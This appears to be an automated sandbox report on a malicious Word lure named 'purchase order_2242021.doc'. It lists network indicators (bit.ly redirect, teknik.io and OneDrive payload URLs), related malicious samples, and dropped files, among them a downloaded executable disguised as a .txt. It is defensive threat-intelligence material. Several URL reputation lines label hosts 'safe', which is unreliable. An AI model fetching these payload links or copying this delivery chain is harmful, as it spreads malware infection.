https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://JSQBKI.com	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.11	true	false	high
teknik.io	5.79.72.163	true	false	high
onedrive.live.com	unknown	unknown	false	high
cbzrfq.bl.files.1drv.com	unknown	unknown	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bit.ly/3qO7045	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://JSQBKI.com	RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21108&authkey=AN1oxHG	RegAsm.exe, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351491082.00000000005D8000.00000004.00000020.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.%s.comPA	RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cbzrfq.bl.files.1drv.com/	RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	false		high
https://cbzrfq.bl.files.1drv.com/D	RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net0D	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/	RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmp	false		high
https://u.teknik.io/PWua8.txt	3qO7045[1].htm.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.199.248.11	unknown	United States		396982	GOOGLE-PRIVATE-CLOUDUS	false
5.79.72.163	unknown	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	357325
Start date:	24.02.2021
Start time:	13:05:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	purchase order_2242021.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@8/19@4/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 79% Number of executed functions: 91 Number of non-executed functions: 11
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 23.0.174.185, 23.0.174.187, 67.26.17.254, 8.238.85.126, 8.248.137.254, 8.250.159.254, 8.241.90.126, 13.107.42.13, 13.107.42.12 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, odc-bl-files-brs.onedrive.akadns.net, auto.au.download.windowsupdate.com.c.footprint.net, odc-bl-files-geo.onedrive.akadns.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:06:38	API Interceptor	47x Sleep call for process: EQNEDT32.EXE modified
13:07:56	API Interceptor	78x Sleep call for process: 69577.exe modified
13:08:01	API Interceptor	629x Sleep call for process: RegAsm.exe modified
13:08:11	API Interceptor	296x Sleep call for process: dw20.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	bit.ly/3kijui1
	QUOTE.doc	Get hash	malicious	Browse	bit.ly/2P3CMwd
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	bit.ly/2ZElo32
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	bit.ly/3dyLFYN
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	bit.ly/2OMPBuy
	YOUR PRODUCT.doc	Get hash	malicious	Browse	bit.ly/2LVhrUo
	Invoice.doc	Get hash	malicious	Browse	bit.ly/3amsMGn
	Purchase order.doc	Get hash	malicious	Browse	bit.ly/3qm8NNO
	IMG_04779.doc	Get hash	malicious	Browse	bit.ly/3dffBt0
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/3aLXmrV
	PO_Scanned_06387.doc	Get hash	malicious	Browse	bit.ly/3rwUfef
	IMG_Scanned_3062.doc	Get hash	malicious	Browse	bit.ly/2YXPr5o
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/2MvEzt1
	DTBT760087673.doc	Get hash	malicious	Browse	bit.ly/3arM6Rr
	IMG_59733.doc	Get hash	malicious	Browse	bit.ly/3rf1U0L
	IMG_804941.doc	Get hash	malicious	Browse	bit.ly/3cyMT5V
	IMG_0916.doc	Get hash	malicious	Browse	bit.ly/3pFy7y3
	SOA 2.doc	Get hash	malicious	Browse	bit.ly/3cxhzEz
	Quotation Ref FP-299318.doc	Get hash	malicious	Browse	bit.ly/3anMC2V
	PO 9174-AR.doc	Get hash	malicious	Browse	bit.ly/2LcGNNi
5.79.72.163	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	PO AAN2102002-V020.doc	Get hash	malicious	Browse
	PO55004.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	RFQ Document.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse
	tcwO1bua5E.exe	Get hash	malicious	Browse
	87e8ff5c51e0.xls	Get hash	malicious	Browse
	Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtf	Get hash	malicious	Browse
	hvEUyC1xKe.exe	Get hash	malicious	Browse
	NEW_QUOTATION_mp20201126_Quotation_20P6200829_sup_mpjxPriceInquiry_1606406420424.doc	Get hash	malicious	Browse
	Purchase Order.doc	Get hash	malicious	Browse
	CAz0v9shg2.rtf	Get hash	malicious	Browse
	pGSheevuq8.rtf	Get hash	malicious	Browse
	wtYnMaD8Bg.rtf	Get hash	malicious	Browse
	Wines list12.12.2020.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.11
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	5.79.72.163
	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
	6d0000.exe	Get hash	malicious	Browse	213.227.133.129
	SecuriteInfo.com.Trojan.PackedNET.541.9005.exe	Get hash	malicious	Browse	62.212.86.139
	New Order 83329 PDF.exe	Get hash	malicious	Browse	95.211.208.58
	YTDSetup.exe	Get hash	malicious	Browse	82.192.80.226
GOOGLE-PRIVATE-CLOUDUS	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	67.199.248.16
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.10
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.090852246460565
Encrypted:	false
SSDEEP:	6:kKLRgVpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:jRr3kPlE99SNxAhUeo+aKt
MD5:	06D163042F0078DA3522C50E90975E28
SHA1:	2173031E7AC39CA991EA0C7D992E1F4BEA3DE2A8
SHA-256:	E6E0D52FF25A5EAC6B21282081AA15C511FB0666EEF3B0D91F90F0E114ECB98A
SHA-512:	DE2171EBF28792ADE6A7BE0646575C31FBD2577283AC83737DC4BF7AA1577C797DD789AD45B6F5D584F3D7BAE958FB3A86065D5081C55D674D7E3F4A47E0F41D
Malicious:	false
Reputation:	low
Preview:	p...... ..........4.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0215269645321685
Encrypted:	false
SSDEEP:	3:kkFklMdUtXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKX8JliBAIdQZV7eAYLit
MD5:	418E33A6103113CCFF36E4BE556E8261
SHA1:	D33A2F7A96B8FAA2121BDDEC0D2F3DF3961B1419
SHA-256:	2C2AFE1975A6CA6A7BD38F5954DD86E72B5D1289212A8BB3328317BDB1977E6E
SHA-512:	143B2A4378B9572E4DB1532F732DA5146EBAD0814875DA732A7AB1D0FBB17F3F45A6F5E8D2482427BDFE00C2A98DA90968F63394F58D16A8C890782E1AF64B37
Malicious:	false
Reputation:	low
Preview:	p...... ....`...........(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	131072
Entropy (8bit):	4.79650156443488
Encrypted:	false
SSDEEP:	1536:HWWTwV4fVhuy/kysvxhG7NuX40vbyovaWm5vj2kht/uxVQwV4MjW:7wVUPsyChtX40Tyova75vj2mt/QqwV
MD5:	5D2D34449323C67BA1F5EC7561DF2204
SHA1:	A48C7F51DB44CA8A2B0240D9C57C1983AC5D75DD
SHA-256:	95A1FF3F5D08AC3D0DFE64300EEC668FA0C78BDB7DA395F1D91735C5A0AEF8A5
SHA-512:	28B4C6DF609084045F866686E559C7771B6455BC8FDE56942F9422265C6ED2ACFE12EF383C23225AD171D9D7BA22EFC9EF7137C069070812AF798EDAA8AE6D73
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Reputation:	low
IE Cache URL:	https://u.teknik.io/PWua8.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...n\RK.................P...................`....@..................................J.......................................R..(....p.....................................................................(... ....................................text...DF.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3qO7045[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.555420363401828
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+dEJRTHsIkFSXbKFvNGb:qFzLIeco3XLx92ZHqGJVMIMSLWQb
MD5:	5430FAE62906F346226C0F6B7EDB2505
SHA1:	1CAB9FF7715955A9BD0C3702AF5152353BAA6901
SHA-256:	104F6C00E1E641D26F8F4E324B88FFA7A6A825FA195DBBABA775BBD8F86EC554
SHA-512:	FBEF7B1D0A394927CAEFF28C56E9F0ED1F59949BB964D3BC1B5C197128BC2F08FFFD97A3FA68145FD0534ABC2253277797C68A9710D605D747D7388924302EF3
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/PWua8.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{96CDA2CA-B597-4160-9AA2-9325CEFB4D67}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3573187972516119
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbf:IiiiiiiiiifdLloZQc8++lsJe1MzM
MD5:	ADEECB285197F0DA2AC8593087E205A2
SHA1:	78E89DAF70658C478C753D50D4C39755F5CDCA84
SHA-256:	4FE2B6146A5F8F2641F78A01D06063848F0790082776D94ADACD89D9A462E0E1
SHA-512:	307F3F8621F1B9FF604041D8BC7746BBAC8C706537797E40F910625D0882BED9E2EAEEB78D801850F79EDA41D550670C72F4DE363EAE7F84E67BA93458C0CFE4
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BFBB-6C9AC8D8FC42}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3498022
Entropy (8bit):	4.142539932120983
Encrypted:	false
SSDEEP:	24576:FDKMKEUMKOyMKwpMKMlMYkKMGMKt1MKohMHwKMe9KM6MKo9MwheQ:vQ
MD5:	A1F0AB1026D7BD370F80083BBA7CE963
SHA1:	32BC747DED3B2018E0856E759FF03ADEA33BF5EE
SHA-256:	C6E3761741B575DD410FD2C5857E950F1A15F4C515FE5D32BBDA920AE9FD8B79
SHA-512:	5493327842E3569752958E78F948FC08811790F81746834547C1BD8AA005D36C6D5C9E1ECEB12363CBF6ABBEFA61AC75354A237A493FB732F91FA0E1B5EF7E5C
Malicious:	false
Reputation:	low
